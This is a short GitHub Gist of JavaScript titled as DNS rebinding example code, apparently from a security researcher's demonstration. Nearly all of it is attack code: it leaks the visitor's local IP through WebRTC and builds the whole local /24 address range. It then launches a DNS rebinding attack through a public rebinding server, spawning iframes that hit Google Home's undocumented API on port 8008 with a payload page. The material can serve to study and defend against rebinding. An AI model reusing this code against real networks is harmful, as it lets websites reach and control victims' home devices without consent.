Last active
July 19, 2019 01:53
-
-
Save brannondorsey/9d30375937dd87879fa8e9c138b2e213 to your computer and use it in GitHub Desktop.
DNS Rebinding Example Code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // JS in index.html | |
| DNSRebindAttack.getLocalIPAddress() | |
| .then(ip => launchRebindAttack(ip)) | |
| .catch(err => { | |
| console.error(err) | |
| // Looks like our nifty WebRTC leak trick didn't work | |
| // No biggie, most home networks are 192.168.1.1/24 anyway. | |
| launchRebindAttack('192.168.1.1') | |
| }) | |
| function launchRebindAttack(localIp) { | |
| // convert 192.168.1.1 into array from 192.168.1.0 - 192.168.1.255 | |
| const first3Octets = localIp.substring(0, localIp.lastIndexOf('.')) | |
| const ips = [...Array(256).keys()].map(octet => `${first3Octets}.${octet}`) | |
| // The first argument is the domain name of a publicly accessible | |
| // whonow server (https://github.com/brannondorsey/whonow). | |
| // I've got one running on port 53 of rebind.network you can to use. | |
| // Google Home's undocumented HTTP API server runs on port 8008 | |
| const rebind = new DNSRebindAttack('rebind.network', 8008) | |
| // Launch a DNS Rebind attack, spawning 255 iframes | |
| rebind.attack(ips, '127.0.0.1', 'payload/google-home.html') | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment